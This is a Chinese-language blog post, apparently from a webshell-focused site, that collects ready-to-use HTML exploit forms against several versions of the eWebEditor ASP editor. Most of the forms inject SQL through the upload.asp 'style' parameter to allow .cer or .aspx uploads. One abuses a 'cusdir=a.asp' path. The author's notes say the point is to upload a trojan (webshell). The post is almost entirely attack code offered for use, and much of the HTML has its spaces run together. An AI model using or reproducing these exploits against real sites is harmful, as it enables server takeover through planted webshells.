各种版本eweb利用exp
|
各种版本eweb利用exp <H1>1.ewebeditor asp版 1.0.0 上传漏洞利用程序----By HCocoa</H1><br><br>
<formaction="http://要上传的地址/ewebeditor/upload.asp?action=save&type=IMAGE&style=hcocoa' union select S_ID,S_Name,S_Dir,S_EditorHeader,S_Body,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer|aspx',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord from ewebeditor_style where s_name='standard'and'a'='a"method=postname=myformenctype="multipart/form-data">
<inputtype=filename=uploadfilesize=100><br><br>
<inputtype=submitvalue=Fuck>
</form>
======================================================================================================
<HTML><HEAD><TITLE>ewebeditor2.16的upload文件上传exp</TITLE><metahttp-equiv="Content-Type"content="text/html; charset=gb2312"> </head><bodybgcolor=orange>
<tr>不是通杀,版本有区别!我就郁闷,落叶那JJ说文章没说清楚,这份EXP就是根据文章写出来的!落叶那家伙的EXP我看半天没看明白有啥区别!<br></tr>
<tr>文件传到了uploadfile目录下了</tr><br>
<tr>不知道算不算0day,我是冰的原点</tr><br>
<tr>至于利用方法就是修改源文件中的action,然后传cer的马马就行了!</tr><br>
<formaction="http://要上传的网址/ewebeditor/upload.asp?action=save&type=IMAGE& style=firefox'%20union%20select%20S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt,%20[S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl%20from%20ewebeditor_style%20where%20s_name='standard'%20and%20'a'='a"method=postname=myformenctype="multipart/form-data"><inputtype=filename=uploadfilesize=100style="width:100%"><inputtype=submitvalue=传吧></form>
=====================================================================================================================
<H1>ewebeditor asp版 2.7.5 上传漏洞利用程序</H1><br><br>
<formaction="http://要上传的网址/ewebedit/upload.asp?action=save&type=&style=可以上传asa的样式名"method=postname=myformenctype="multipart/form-data">
<inputtype=filename=uploadfilesize=1style="width:100%">
<inputtype=submitvalue="上传了"></input>
</form>
=====================================================================================================================
<HTML><HEAD><TITLE>
ewebeditor 5.5 6.0 上传漏洞</TITLE><metahttp-equiv="Content-Type"content="text/html; charset=gb2312"> </head><bodybgcolor=orange>
<form action="http://要上传的网址/ewebeditor/asp/upload.asp?action=savetype=image&style=popup&cusdir=a.asp" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>
|
转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/1861.html